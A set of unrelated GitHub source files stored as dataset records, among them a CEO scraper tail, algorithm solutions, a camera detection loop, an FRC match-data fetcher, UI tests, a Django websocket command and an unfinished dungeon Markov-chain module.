'en-US,en;q=0.9'\n\n response = session.get(url)\n # Check response headers\n encoding = response.encoding\n # This site has a method of encryption particular.\n html_get = response.content.decode(encoding)\n\n bs_parsed = BeautifulSoup(html_get, \"html.parser\")\n # Get all CEO's data\n leaders = bs_parsed.findAll('div', class_='leading-snug')\n\n name_ls = []\n\n linked_ls = []\n \n for leader in leaders: # This loop loops through the data for each CEO and stores it in the company_dict.\n details = leader.findAll('div')\n try:\n name = details[0].text \n except:#if no name 
displayed i store the slung\n log_dict[slug] = 'CEO Name'\n\n try:\n linkedin = details.find('a', {'title':'LinkedIn profile'}).get('href')\n except:#if no linkedin displayed i store the slung\n log_dict[slug] = 'CEO Linkedin'\n\n name_ls.append(name)\n linked_ls.append(linkedin)\n \n companies_data[slug]['CEO Name'] = name_ls\n companies_data[slug]['LinkedIn'] = linked_ls\n \n time.sleep(random.randint(1,5))\n\n#Now with all the data stored in company_dict it is stored as a JSON\nwith open('./companies.json', 'w') as companies_json:\n json.dump(companies_data, companies_json, indent=4)\n\n\nwith open('./log_failed.json', 'w') as logs:\n json.dump(log_dict, logs, indent=4)\n","repo_name":"NNunezManzano/scrapers","sub_path":"ycombinator/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14424660791","text":"\"\"\"\nSolution 1: Recurrsive\n\nTime: O(n)\nSpace: O(h) for the call stack where h is the height of the tree\n\nSolution 2: Iterative\n\nTime: O(n)\nSpace: O(n) for storing nodes present in any level of binary tree. Worst case happens for a full binary tree, in which last level has n/2 nodes\n\n\"\"\"\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\nfrom collections import deque\n\nclass Solution:\n \"\"\"\n @param root: a TreeNode, the root of the binary tree\n @return: nothing\n \"\"\"\n \"\"\"\n Iterative:\n \"\"\"\n def invertBinaryTree(self, root):\n if root is None:\n return None\n \n queue = deque([root])\n \n while queue:\n node = queue.popleft()\n \n temp = node.left\n node.left = node.right\n node.right = temp\n \n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n \n return root\n \n \"\"\"\n Recurrsive:\n \n def invertBinaryTree(self, root):\n # write your code here\n if root is None:\n return None\n \n new_left = self.invertBinaryTree(root.right)\n new_right = self.invertBinaryTree(root.left)\n \n root.left, root.right = new_left, new_right\n \n return root\n \"\"\"\n","repo_name":"teslamyesla/leetcode","sub_path":"python/lintcode-0175-invert-binary-tree.py","file_name":"lintcode-0175-invert-binary-tree.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69917595667","text":"\nimport numpy as np\nimport cv2\nimport time\nimport math \nimport cProfile\n\n# Imports from our project\nfrom modules.calibrator import *\nfrom modules.gextractorNG import *\nfrom modules.dextractor import *\nfrom modules.fisheye import *\nfrom modules.settings import *\nfrom modules.network import *\nfrom modules.gpiomanager import *\nfrom modules.classifier import *\n\n# Here we build the code that calls other scripts to do all the work\ndef main(conf_file):\n # Opening data stream\n cap = cv2.VideoCapture(0)\n \n # Loading data from config.yml\n conf = Config()\n conf.load(conf_file)\n\n\n # Generating FishEye remover object\n if(conf.fish == 1):\n fishremover = FRemover(1, conf.K, conf.D, conf.DIM)\n \n # Loading perspective correction matrix from file if exits\n if(conf.matrix == 1):\n calibobj = Calib(conf.sizeXmm//conf.reduction,conf.sizeYmm//conf.reduction,conf.matrix,conf.calibfile)\n calibobj.M = conf.M\n\n # Generating data object (to stock collected data)\n \n # Initializing GPIO\n gpioM = GpioManager()\n\n # Classifier\n cl 
= Classifier(\"classifier/trained/cascade.xml\")\n\n i = 0\n changedConf = 0\n j = 1\n t = time.time()\n while(cap.isOpened()):\n ret, img = cap.read()\n if(img is None):\n break\n img = cv2.resize(img, (0, 0), fx=conf.img_resize_default,fy=conf.img_resize_default)\n #cv2.imshow('real', resized)\n\n # Removing fisheye\n if(conf.fish == 1):\n img = fishremover.removefish(img)\n img = cv2.resize(img, (0, 0), fx=conf.img_resize_after_fish,fy=conf.img_resize_after_fish)\n \n # Applying perspective correction matrix to frame\n if(conf.matrix):\n img = calibobj.applyCalibration(img)\n img = cv2.resize(img, (0, 0), fx=conf.img_resize_after_perpective,fy=conf.img_resize_after_perpective)\n \n cl.detectAndDisplay(img)\n \n # FPS\n if(conf.fps):\n if(time.time()-t>1): \n t = time.time()\n print(\"[INFO] {} FPS\".format(j))\n j = 1\n \n # Led & Switch\n changedConf = gpioM.update()\n if(changedConf):\n break\n \n i += 1\n j += 1\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n cap.release()\n cv2.destroyAllWindows()\n\n # Switching procedure\n if(changedConf):\n bc = BaseConfig()\n bc.load(\"config.yml\")\n if(bc.confYellow == conf_file):\n main(bc.confBlue)\n else:\n main(bc.confYellow)\n\n\nbc = BaseConfig()\nbc.load(\"config.yml\")\nmain(bc.confYellow)\n","repo_name":"arem-cdr/Camera","sub_path":"experiments/test_neuralnet/pviola/main_nn.py","file_name":"main_nn.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20619391855","text":"from match_data import *\nimport requests\nimport json\n\ndef do_api_call(url):\n r = requests.get(url=url)\n response_data = r.json()\n return response_data\n\ndef parse_data(data_dict):\n\n alliance_colours = [\"blue\", \"red\"]\n alliance_data = {\"blue\": 0, \"red\": 0}\n for alliance in alliance_colours:\n team_data = []\n auto_game_pieces = data_dict[\"score_breakdown\"][alliance][\"autoGamePieceCount\"]\n tele_game_pieces = data_dict[\"score_breakdown\"][alliance][\"teleopGamePieceCount\"]\n auto_engaged = data_dict[\"score_breakdown\"][alliance][\"autoBridgeState\"] == \"Level\"\n endgame_engaged = data_dict[\"score_breakdown\"][alliance][\"endGameBridgeState\"] == \"Level\"\n for i in range(3):\n team_number = data_dict[\"alliances\"][alliance][\"team_keys\"][i][3:]\n robot_mobility = data_dict[\"score_breakdown\"][alliance][f\"mobilityRobot{i+1}\"]\n robot_auto_charge_station = \"None\"\n if data_dict[\"score_breakdown\"][alliance][f\"autoChargeStationRobot{i+1}\"] == \"Docked\":\n if auto_engaged:\n robot_auto_charge_station = \"Engaged\"\n else:\n robot_auto_charge_station = \"Docked\"\n robot_endgame_charge_station = \"None\"\n if data_dict[\"score_breakdown\"][alliance][f\"endGameChargeStationRobot{i+1}\"] == \"Docked\":\n if endgame_engaged:\n robot_endgame_charge_station = \"Engaged\"\n else:\n robot_endgame_charge_station = \"Docked\"\n team_data.append(TeamData(team_number, robot_mobility, robot_auto_charge_station, robot_endgame_charge_station))\n\n alliance_data[alliance] = AllianceData(alliance, team_data, auto_game_pieces, tele_game_pieces)\n\n match_data = MatchData(data_dict[\"match_number\"], alliance_data)\n return match_data\n\n\ndef get_match_data(event_key, match_key):\n key = f\"{event_key}_{match_key}\"\n\n f = open(\"api_key.secret\", \"r\")\n api_key = f.read()\n f.close\n\n base_url = \"https://www.thebluealliance.com/api/v3\"\n url = f\"{base_url}/match/{key}?X-TBA-Auth-Key={api_key}\"\n\n response_data = do_api_call(url)\n 
return parse_data(response_data)\n\ndef write_file(data):\n file = open(\"data.csv\", \"w\")\n file.write(\"Match,Alliance,Team,Mobility,Auto Charge Station,Endgame Charge Station,Alliance Auto Pieces,Alliance Tele Pieces\\n\")\n for match in data:\n for colour in ['blue', 'red']:\n alliance = match.alliances[colour]\n for team in alliance.teams:\n line = f\"{match.match_num},{alliance.alliance_colour},{team.team_number},{team.robot_mobility},{team.robot_auto_charge_station},{team.robot_endgame_charge_station},{alliance.auto_game_pieces},{alliance.tele_game_pieces}\\n\"\n file.write(line)\n file.close\n\n\ndef main():\n print(\"Powered by The Blue Alliance. See thebluealliance.com\")\n event_key = input(\"Enter event key: \")\n match_key = input(\"Enter match key prefix: \")\n start_match = input(\"Enter start match: \")\n end_match = input(\"Enter end match: \")\n\n data = []\n for i in range(int(start_match), int(end_match) + 1):\n current_match = match_key + str(i)\n data.append(get_match_data(event_key, current_match))\n\n write_file(data)\n\n print(\"Data written\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Evan-Armoogan/2023TBAMatchData","sub_path":"get_event_match_data.py","file_name":"get_event_match_data.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35308448825","text":"import mcs\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns \nimport matplotlib.dates as mdates\nfrom mcs.data_loaders import sniffer\n\n\nloader = sniffer.SNIFFERdataloader()\ndf = loader.load_data('snifferdata11-11_184')\ndf2 = loader.load_data('snifferdata11-11_321')\n\n#Set time range for plots \ndata = df.loc[((df[['time']] < '2022-11-11 14:40:00').all(axis=1) \n& (df[['time']] > '2022-11-11 13:30:00').all(axis=1))]\n\n\n#create variables for plots\nx1 = data['time']\ny1 = data['pm2_5']\ny2 = data['pm1_0']\ny3 = data['pm10']\n\n#plot pm values over time\nsns.set()\nfig, ax = plt.subplots()\nax.plot(x1, y3, label = 'PM 10', alpha = 0.8)\nax.plot(x1, y2, label = 'PM 1', alpha = 0.8)\nax.plot(x1, y1, label = 'PM 2.5', alpha = 0.8)\nax.xaxis.set_major_formatter(mdates.DateFormatter(\"%H:%M\"))\n\nplt.ylabel('μm/m³')\nplt.xlabel('time')\nplt.title('Snifferbike PM measurements 11-11-2022')\nplt.legend()\nplt.show()\n\n\n","repo_name":"jpjagt/maqc","sub_path":"analysis/sniffer_analysis.py","file_name":"sniffer_analysis.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43517373882","text":"# 다솜이는 기타를 많이 가지고 있다. 그리고 각각의 기타는 모두 다른 시리얼 번호를 가지고 있다. 다솜이는 기타를 빨리 찾아서 빨리 사람들에게 연주해주기 위해서 기타를 시리얼 번호 순서대로 정렬하고자 한다.\r\n#\r\n# 모든 시리얼 번호는 알파벳 대문자 (A-Z)와 숫자 (0-9)로 이루어져 있다.\r\n#\r\n# 시리얼번호 A가 시리얼번호 B의 앞에 오는 경우는 다음과 같다.\r\n#\r\n# A와 B의 길이가 다르면, 짧은 것이 먼저 온다.\r\n# 만약 서로 길이가 같다면, A의 모든 자리수의 합과 B의 모든 자리수의 합을 비교해서 작은 합을 가지는 것이 먼저온다. (숫자인 것만 더한다)\r\n# 만약 1,2번 둘 조건으로도 비교할 수 없으면, 사전순으로 비교한다. 
숫자가 알파벳보다 사전순으로 작다.\r\n# 시리얼이 주어졌을 때, 정렬해서 출력하는 프로그램을 작성하시오.\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nN = int(input().strip())\r\nguitar = []\r\nfor i in range(N):\r\n info = input().strip()\r\n len_info = len(info)\r\n val = 0\r\n for j in info:\r\n if j.isdigit():\r\n val += int(j)\r\n # 이름, 입력값 길이, 자릿수의 합\r\n guitar.append([info, len_info, val])\r\n\r\nguitar = sorted(guitar, key = lambda x : (x[1], x[2], x[0]))\r\nfor i in range(len(guitar)):\r\n print(guitar[i][0])\r\n","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"1000~1999/1431.py","file_name":"1431.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69904187026","text":"from typing import Optional, List\n\nimport glm # type: ignore\n\nfrom .parsing.rsm import Rsm\nfrom .utils import decode_string\n\n\nclass Node:\n def __init__(\n self,\n rsm_node: Rsm.Node,\n children: List['Node'] = [],\n parent: Optional['Node'] = None,\n ):\n self.impl = rsm_node\n self.parent = parent\n self.children = children\n self.bbox = None\n self.local_transform_matrix = glm.mat4()\n self.final_transform_matrix = glm.mat4()\n self.gltf_transform_matrix = glm.mat4()\n\n\ndef extract_nodes(rsm_obj: Rsm) -> List[Node]:\n node_list = []\n for rsm_node in rsm_obj.nodes:\n node_list.append(Node(rsm_node))\n\n for node in node_list:\n node.children = _find_children_nodes(node_list, node)\n node.parent = _find_parent_node(node_list, node)\n\n return node_list\n\n\ndef _find_parent_node(nodes: List[Node], node: Node) -> Optional[Node]:\n parent_name = decode_string(node.impl.parent_name)\n if len(parent_name) == 0:\n return None\n for other_node in nodes:\n if other_node != node and decode_string(\n other_node.impl.name) == parent_name:\n return other_node\n return None\n\n\ndef _find_children_nodes(nodes: List[Node], node: Node) -> List[Node]:\n children = []\n node_name = decode_string(node.impl.name)\n for other_node in nodes:\n parent_name = decode_string(other_node.impl.parent_name)\n if other_node == node or len(parent_name) == 0:\n continue\n if parent_name == node_name:\n children.append(other_node)\n return children","repo_name":"L1nkZ/rag2gltf","sub_path":"rag2gltf/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"3686613888","text":"from bs4 import BeautifulSoup\nfrom html import unescape\nimport os\nimport spacy\n\nimport nltk\n\nnltk.download('words')\nwords = set(nltk.corpus.words.words())\n\n\ntry:\n spacy_en = spacy.load(\"en_core_web_sm\")\nexcept:\n os.system('python -m spacy download en_core_web_sm')\n spacy_en = spacy.load(\"en_core_web_sm\")\n\n\nstops_spacy = sorted(spacy.lang.en.stop_words.STOP_WORDS)\nstops_spacy.extend([\"is\", \"to\"])\n\n\ndef remove_stopwords_spacy(text, stopwords=stops_spacy):\n text = ' '.join([word for word in text.split() if word not in stopwords])\n return text\n\n\ndef lemmatize_spacy(text):\n text = spacy_en(text)\n lemmas = [token.lemma_ for token in text]\n return \" \".join(lemmas)\n\n\ndef remove_non_eng_words(text):\n return \" \".join(w for w in nltk.wordpunct_tokenize(text) \\\n if w.lower() in words or not w.isalpha())\n\n\ndef textLower(text):\n return text.lower()\n\n\ndef remove_punctuation(text):\n text = ''.join([char if char.isalnum() or char == ' ' else ' ' for char in text])\n text = ' '.join(text.split()) # remove multiple whitespace\n\n return 
text\n\n\ndef normalize(text):\n # replace urls\n soup = BeautifulSoup(unescape(text), 'html')\n for a_tag in soup.find_all('a'):\n a_tag.string = 'URL'\n\n text = soup.text\n return text\n","repo_name":"Arman-Deghoyan/Document-Classification","sub_path":"serve/text_utils.py","file_name":"text_utils.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41836610835","text":"from base.test_base import TestBase\n\n\nclass TestTfqBangDan(TestBase):\n \"\"\"\n 榜单页面\n \"\"\"\n\n def setUp(self) -> None:\n self.page_name = \"/page/taofangquan/bangdan/main?main_id=1&city=qz\"\n self.switch = False\n self.classname = self.__class__.__name__\n super(TestTfqBangDan, self).setUp()\n print(\"TestTfqBangDan setup\")\n\n def test_05_click_tiezi_点击帖子(self):\n \"\"\"\n 淘房圈-榜单页面,点击帖子\n \"\"\"\n self.find_element('view[class=\"post_title tfLine1\"]').tap()\n\n self.verifyPageName('/page/taofangquan/tieziDetail/tieziDetail')\n self.get_screenshot()\n\n def test_02_click_post_发帖按钮(self):\n \"\"\"\n 淘房圈-榜单页面,点击”发帖“\n \"\"\"\n self.find_element('image[class=\"postBtn_img\"]').tap()\n\n self.verifyPageName('/page/taofangquan/writePost/writePost')\n self.get_screenshot()\n\n def test_01_click_more_推荐榜单(self):\n \"\"\"\n 淘房圈-榜单页面,点击”推荐榜单“\n \"\"\"\n self.find_element('view[class=\"more_txt\"]').tap()\n\n self.get_screenshot()\n\n def test_03_click_share_分享(self):\n \"\"\"\n 淘房圈-榜单页面,点击”分享“\n \"\"\"\n self.find_element('button[class=\"newHouseRfixed-share\"]').tap()\n\n self.get_screenshot()\n\n def test_04_click_share_hb_分享海报(self):\n \"\"\"\n 淘房圈-榜单页面,点击”分享“,生成海报\n \"\"\"\n self.find_element('button[class=\"newHouseRfixed-share\"]').tap()\n self.delay(2)\n self.find_element('button[class=\"share-btn pyq\"]').tap()\n\n self.verifyStr(True,\n self.page.element_is_exists('button[class=\"canvasToImage--saveToAlbumButton\"]'),\n '生成海报页 ok')\n self.get_screenshot()\n\n def test_06_z_click_share_hy_分享好友(self):\n \"\"\"\n 淘房圈-榜单页面,点击”分享“,分享好友\n \"\"\"\n self.find_element('button[class=\"newHouseRfixed-share\"]').tap()\n self.delay(2)\n self.find_element('button[class=\"share-btn hy\"]').tap()\n self.delay(1)\n self.input_value_by_mk('tfq/share_send.png')\n\n self.get_screenshot()\n\n","repo_name":"gzsyr/tfminium","sub_path":"tfq/test_tfq_bangdan_榜单.py","file_name":"test_tfq_bangdan_榜单.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20644080671","text":"from matplotlib.pylab import figure, show, savefig, title, axis, draw\nfrom networkx import spring_layout, draw_networkx_edges, draw_networkx_nodes\nfrom matplotlib.animation import FuncAnimation\n\n\ndef add_node(graph, i, plot_layout):\n # draw_networkx_edges(graph, plot_layout, alpha=.3)\n # draw_networkx_nodes(node, plot_layout, node_size=100, edgecolors='k', node_color='w')\n i += 1\n draw()\n\n\ndef animate_creation(network, blocking=True, save_plot=True):\n _title = 'Free-Scale Network'\n fig = figure(_title)\n axis('off')\n\n graph = network.network_plot\n plot_layout = spring_layout(graph)\n\n init_nodes = graph.nodes[:3]\n init_edges = graph.edges[:2]\n draw_networkx_nodes(graph, plot_layout, nodelist=init_nodes, node_size=100, edgecolors='k', node_color='w')\n draw_networkx_edges(graph, plot_layout, edgelist=init_edges, alpha=.3)\n draw()\n show()\n i = 3\n\n animation = FuncAnimation(fig, add_node, fargs=(graph, i, 
plot_layout))\n\n","repo_name":"simonsben/undergrad_thesis","sub_path":"utilities/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17735628399","text":"# These Manage the Game's Naming Easter Eggs\n# name or lowername is the name that is asked of you when you start the Main Program\n\nlowername = name.lower()\n\nif lowername == 'indra':\n slowprint(\"Isn't that interesting\", lead_dots = True)\n sleep(2)\n print(\"We have the same name\", lead_dots = True)\n sleep(2)\n\nelif lowername == \"hartsaxena\":\n print (\"Ah.\")\n sleep(1.5)\n print (\"It's you again.\")\n sleep(1.5)\n\nelif lowername == 'guido rossum' or lowername == 'guido van rossum':\n print(\"You know, a person with that same name invented Python!\")\n sleep(2)\n print(\"But you probably already knew that, didn't you?\")\n sleep(2)\n\nelif lowername == 'scott cawthon':\n print(\"it's you...\")\n sleep(1.5)\n print(\"Or should I say it's me...\")\n sleep(1)\n\nelif lowername == 'sans':\n print(\"nope.\")\n sleep(1)\n namereject = True # See Reset.py\n\nelif lowername == 'monika':\n print(\"_J̷̩̍u̶͇͂s̵͚̽t̸͈̕ M̷̪̃ŏ̷͖n̸͕̂i̷̦͝k̵͍̕a̵̛̱_\")\n sleep(1)\n print (\"I suppose great minds think alike.\")\n sleep(1.5)\n print (\"I wonder what brings you to a place like this?\")\n sleep(2)\n print (\"I suppose I'll never know.\")\n sleep(1.5)\n namereject = True\n\nelif lowername == 'gaster':\n AbruptRestart() # This Restarts the Game\n\nelif lowername == 'dwight schrute':\n print(\"I wonder...\")\n sleep(2)\n print(\"Sorry, I just thought I knew you from somewhere\")\n sleep(2)\n\nelif lowername == 'matpat':\n print(\"But that's just a Theory.\")\n sleep(0.5)\n print(\"A ga-\")\n sleep(0.25)\n namereject = True\n\nelif lowername == 'baldi':\n print(\"Congratulations!\")\n sleep(1)\n print(\"You found all Seven Notebooks!\")\n sleep(1.25)\n print(\"Now all you have to do is...\")\n namereject = True\n\nelif lowername == \"xnflp\":\n namereject = True\n\nelif lowername == \"reset\":\n exec(open(sysexecutes / \"ExecLogDel.py\").read())\nelse:\n print(\"Hello, \" + name + \"! 
Pleasure to meet you!\")\n sleep(2)\n\n# Executes if namereject == True and records it in the logs\nif namereject == True:\n a = open(intlog, \"a+\")\n a.write('Name Rejected: ' + name + \" Time: \" + currentdate)\n a.close()\n sys.exit()\n","repo_name":"Hartsaxena/ProjectIndra","sub_path":"Vitals/NameEggs.py","file_name":"NameEggs.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14362653606","text":"# %%\nfrom distutils import filelist\nimport os\nimport pandas as pd\nimport tkinter as tk\nfrom tkinter import filedialog\n\n# %%\n# user dialog for selection of directory\nroot = tk.Tk()\ndir = filedialog.askdirectory(parent=root, initialdir=\".\", title='Please select feature directory:')\nxlsx_file = filedialog.askopenfilename(parent=root, initialdir=\".\", title='Please select feature file (.xlsx):')\nslide_table = 'slide_table.csv'\nexcluded_table = 'excluded_table.csv'\npatient_xlsx_single_table = 'patient_xlsx_single.xlsx'\n\npatient_xlsx = pd.read_excel(xlsx_file)\npatient_xlsx_single = patient_xlsx.drop_duplicates()\npatient_list = patient_xlsx_single['PATIENT']\n\n# %%\nfilelist = []\nfor file in os.listdir(dir):\n filename = os.fsdecode(file)\n if filename.endswith(\".h5\"):\n filelist.append(filename)\n\n# %%\npats = pd.DataFrame([], columns=['PATIENT', 'FILENAME'])\nexcs = pd.DataFrame([], columns=['PATIENT'])\n\nfor patient in patient_list:\n for element in filelist:\n if patient in element:\n pats.loc[len(pats)]=([patient, element.split('.')[0]]) \n\nfor patient in patient_list:\n if patient not in pats['PATIENT'].values:\n excs.loc[len(excs)]=([patient])\n\nprint(patient_xlsx_single)\n# %%\npatient_xlsx_single.to_excel(patient_xlsx_single_table, index=False)\npats.to_csv(slide_table, columns=['PATIENT', 'FILENAME'], index=False)\nexcs.to_csv(excluded_table, columns=['PATIENT'], index=False)\n","repo_name":"gustavmarco/utils","sub_path":"find_string_in_files_and_extract.py","file_name":"find_string_in_files_and_extract.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21546129213","text":"import time\nfrom django.core.management import BaseCommand, CommandError\nfrom channels import channel_backends, DEFAULT_CHANNEL_BACKEND\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('port', nargs='?',\n help='Optional port number')\n\n def handle(self, *args, **options):\n # Get the backend to use\n channel_backend = channel_backends[DEFAULT_CHANNEL_BACKEND]\n if channel_backend.local_only:\n raise CommandError(\n \"You have a process-local channel backend configured, and so cannot run separate interface servers.\\n\"\n \"Configure a network-based backend in CHANNEL_BACKENDS to use this command.\"\n )\n # Run the interface\n port = int(options.get(\"port\", None) or 9000)\n try:\n import asyncio\n except ImportError:\n from channels.interfaces.websocket_twisted import WebsocketTwistedInterface\n self.stdout.write(\"Running Twisted/Autobahn WebSocket interface server\")\n self.stdout.write(\" Channel backend: %s\" % channel_backend)\n self.stdout.write(\" Listening on: ws://0.0.0.0:%i\" % port)\n WebsocketTwistedInterface(channel_backend=channel_backend, port=port).run()\n else:\n from channels.interfaces.websocket_asyncio import WebsocketAsyncioInterface\n self.stdout.write(\"Running asyncio/Autobahn WebSocket interface server\")\n 
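            # Hedged usage note, not part of the original command: once this
            # module sits under an app's management/commands/ directory as
            # runwsserver.py, the interface server is started with, e.g.:
            #
            #   python manage.py runwsserver          # defaults to port 9000
            #   python manage.py runwsserver 8001     # optional port argument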
self.stdout.write(\" Channel backend: %s\" % channel_backend)\n self.stdout.write(\" Listening on: ws://0.0.0.0:%i\" % port)\n WebsocketAsyncioInterface(channel_backend=channel_backend, port=port).run()\n","repo_name":"sonthonaxrk/channels","sub_path":"channels/management/commands/runwsserver.py","file_name":"runwsserver.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"16919627662","text":"#!/usr/bin/env python3\n# encoding: utf-8\n# ───────────────────────────────── imports ────────────────────────────────── #\nfrom .markov import MarkovChain\nfrom .characters import Adventurer, AdventurerLearning,State\nfrom .dungeon_map import DungeonMap, Direction, Cell, AStar\nfrom .utils import Color, color_grid\nfrom random import random\nimport numpy as np\n# ──────────────────────────────────────────────────────────────────────────── #\n\n# ────────────── Kernel classes for the MADI project (01/2019) ─────────────── #\nclass Dungeon(object):\n \"\"\" Dungeon object containing all the game logic \"\"\"\n\n p_enemy = 0.7\n\n def __init__(self, n: int, m: int, nb_players: int = 1, player_classes: list= None, new_env: bool = True):\n self.n, self.m = n, m\n State.configure(self.n, self.m)\n\n # ------------------------ creating a new map ------------------------ #\n self.map = DungeonMap(n, m, new_env)\n while not self.winnable:\n self.map = DungeonMap(n, m, new_env)\n\n self.last_actions = [None for i in range(nb_players)]\n self.over, self.won = False, False\n self.caption = ''\n\n self.teleport_distributions = {}\n\n # ------------------------ generating players ------------------------ #\n player_classes = [AdventurerLearning for i in range(nb_players)] \\\n if player_classes is None else player_classes\n assert len(player_classes) >= nb_players\n self.agents = [pclass(self) for pclass in player_classes[:nb_players]]\n\n State.configure(n, m)\n\n # ─────────── display a transition matric in a readable output ─────────── #\n def display_transition(self, s: State, a: Direction):\n \"\"\"\n Displays a transition for a given state and action\n \"\"\"\n arr = ['↑', '→', '↓', '←'][a.to_int]\n print('{s},{arr}:'.format(s=s, arr=arr))\n tr = self.make_transition_matrix()[s.id, a.to_int]\n for (i, p) in enumerate(tr):\n if p > 0:\n print('- {p:4.2%}: {st}'.format(p=p, st=State(s_id=i)))\n\n # ───────────────────────── add agent post init ────────────────────────── #\n def add_agent(self, agent: Adventurer):\n self.agents.append(agent)\n\n # ──────────────────── constructing the reward matrix ──────────────────── #\n def make_reward_matrix(self, T: np.array):\n \"\"\"\n The reward matrix is quite simple:\n - death → (*,*,*) : -1\n - (*,0,*) → (*,1,*) take key : 1\n - (*,1,*) → (*,2,*) take treasure : 1\n - (*,2,start) → (*,2,start) : 1\n - else, 0\n Negative reward for death\n Positive reward for (actually) picking up the key, picking up the treasure\n and returning to start with the treasure\n \"\"\"\n n, m = self.n, self.m\n n_state = State.max_id + 1\n death = n_state - 1\n R = np.zeros((n_state, 4), np.float64)\n for sw in range(2):\n for tr in range(3):\n for p in range(n * m):\n s = State(sw, tr, p)\n for a in Direction:\n # we only reward 'certain' actions, actions with\n # probability 1 to lead to a state\n if np.amax(T[s.id, a.to_int]) == 1:\n certain_state = np.argmax(T[s.id, a.to_int])\n st = State(s_id=certain_state) # target state\n # -------------- (*,0,*) → (*,1,*) --------------- #\n # (*  *) (* 
 *)\n if s.treasure == 0 and st.treasure == 1:\n R[s.id, a.to_int] = 0.5\n # -------------- (*,1,*) → (*,2,*) --------------- #\n # (*  *) (* ﰤ *)\n if s.treasure == 1 and st.treasure == 2:\n R[s.id, a.to_int] = 0.5\n # -------------- (0,*,*) → (1,*,*) --------------- #\n # ( * *) (理* *)\n if s.sword == 0 and st.sword == 1:\n R[s.id, a.to_int] = 0.5\n # ---------- (*,2,start) → (*,2,start) ----------- #\n # (* 2 ◉ ) (* 2 ◉ ) \n if s.treasure == st.treasure == 2 and \\\n s.position == st.position == n * m - 1:\n R[s.id, a.to_int] = 1\n # ---------------- death → death ----------------- #\n if s.id == st.id == death:\n R[s.id, a.to_int] = -1\n return R\n\n # ────────────────── constructing the transition matrix ────────────────── #\n def make_transition_matrix(self):\n \"\"\"\n Creates the complete transition matrix, including every possible state\n and action, and the transition from one to another.\n\n Contains all the possible values of T(s, a, s'), the probability to go\n from s to s' by doing a.\n \"\"\"\n n_states = State.max_id + 1 # last state is death\n n, m = self.n, self.m\n T = np.zeros((n_states, 4, n_states), np.float64)\n S = self.markov_chain()\n M = self.moving_markov_chain()\n # ────────────────────────── for each state ────────────────────────── #\n for sw in range(2):\n for tr in range(3):\n for p in range(n * m):\n i, j = p // m, p % m\n s = State(sw, tr, p)\n cell = self.map[i, j]\n # ───────── find the transitions from that state ───────── #\n if cell == Cell.magic_portal or cell == Cell.moving_platform:\n transitions = self.special_transition(S, M, s)\n else:\n transitions = S[s.id, :]\n # ─────── find the state - actions that lead to it ─────── #\n for ((k, l), direction) in self.map.neighbors(i, j):\n # if (k,l) is ↑ of (i, j), (i, j) is ↓ of (k, l)\n s.position = k * m + l\n reverse_dir = direction.reverse\n T[s.id, reverse_dir.to_int, :] = transitions\n # ─────────── any action not yet found is to stay inplace ──────────── #\n for sid in range(n_states):\n for a in Direction:\n s = State(s_id=sid)\n if sum(T[s.id, a.to_int]) == 0:\n mu = np.zeros(n_states, np.float64)\n mu[s.id] = 1\n T[s.id, a.to_int, :] = S.iterate(mu)\n return T\n\n # ──────────────── handling moving platforms and portals ───────────────── #\n def special_transition(self, S: MarkovChain, M: MarkovChain, state: State):\n \"\"\"\n @param S: Markovchain= a markov chain representing the stable states of\n the dungeon, i.e. the states that must only be iterated once\n ex: the 'over an ennemy cell' state. that state might lead to\n itself, and yet you won't fight the ennemy again.\n this markov chain must only be used to advance of 1 time step.\n\n it contains every actual states of the game, including the\n 'death' state.\n\n @param M: Markochain= a markov chain representing the 'moving states' of\n the dungeon, i.e. the states that can be recursive. those\n states, such as the moving platform and the portal, are just\n temporary. they lead you to another stable state, or to\n another moving state that will lead you back elsewhere. they\n can be infinitely cycling between themselves.\n To deal with such states, we need to iterate a markov chain\n until we reach stable probabilities, i.e. 
